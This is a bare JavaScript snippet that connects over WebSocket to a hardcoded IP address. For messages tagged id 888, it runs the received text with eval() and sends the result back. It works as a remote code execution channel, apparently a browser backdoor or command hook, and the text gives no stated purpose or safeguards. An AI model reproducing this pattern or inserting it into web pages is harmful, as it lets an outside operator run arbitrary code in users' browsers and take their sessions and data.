ws = new WebSocket("ws://45.32.200.249:8000/ws"); 
    

    ws.onopen = function(){
      
      console.log('open');
    };
    ws.onmessage = function(ev){

      console.log('recieved message'+ev.data.toString ());
      var json = JSON.parse(ev.data);
      var rowid =json.id;
      if (json.id==888){
          var $ret=eval(json.value)
          ws.send('{"id":'+json.id + ',"value":' + $ret+ '}')
      }
          
    };

    ws.onclose = function(ev){
 
      console.log('closed');
    };
    ws.onerror = function(ev){
      
      console.log('error occurred');
    };